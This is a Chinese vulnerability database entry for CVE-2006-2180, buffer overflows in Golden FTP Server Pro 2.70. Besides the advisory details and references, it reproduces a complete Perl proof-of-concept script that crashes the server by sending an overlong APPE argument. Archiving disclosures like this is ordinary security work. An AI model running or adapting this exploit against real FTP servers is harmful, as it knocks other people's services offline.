Golden FTP Server Pro 多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110205 漏洞类型 缓冲区溢出
发布时间 2006-05-03 更新时间 2007-02-20
CVE编号 CVE-2006-2180 CNNVD-ID CNNVD-200605-072
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/1743
https://www.securityfocus.com/bid/17801
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-072
|漏洞详情
GoldenFTPServerPro2.70存在缓冲区溢出。远程攻击者可以借助一个对(1)NLST或(2)APPE命令的长的自变量,引起拒绝服务(应用程序崩溃),如InfigoFTPStressFuzzer所示。
|漏洞EXP
#!/usr/bin/perl

#
-----------------------------------------------------------------------------------------
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
-----------------------------------------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

if (($host) && ($port)) {

# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;

      print "Trying to connect to $host:$port\n";
      $sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
      print "[+] Connect OK!\n";
      print "Logging...\n";
      if (!$user) {
           $user = "test";
           $pass = "test";
      }
      $sock->login($user, $pass);
      sleep(1);
      $answer = $sock->message;
      print $answer ."\n";
      print "Sending string...\n";
      $sock->quot("APPE",$exploit_string);
} else {
      print "Golden FTP Server Pro 2.70 - Remote APPE command PoC
exploit : DoS\nhttps://www.securinfos.info\n\nUsing: $0 host port [debug: 1 or 0] username password\n\n";
}

# milw0rm.com [2006-05-03]
|受影响的产品
Golden FTP Server Golden FTP Server 2.70
|参考资料

来源:XF
名称:goldenftp-nlst-appe-bo(26195)
链接:http://xforce.iss.net/xforce/xfdb/26195
来源:BID
名称:17801
链接:http://www.securityfocus.com/bid/17801
来源:OSVDB
名称:25217
链接:http://www.osvdb.org/25217
来源:MISC
链接:http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
来源:MISC
链接:http://www.infigo.hr/en/in_focus/tools
来源:VUPEN
名称:ADV-2006-1640
链接:http://www.frsirt.com/english/advisories/2006/1640
来源:SECUNIA
名称:19917
链接:http://secunia.com/advisories/19917
来源:BUGTRAQ
名称:20060502FTPFuzzer
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114658586018818&w=2
来源:BUGTRAQ
名称:20060508INFIGO-2006-05-03:MultipleFTPServersvulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2006-05/0139.html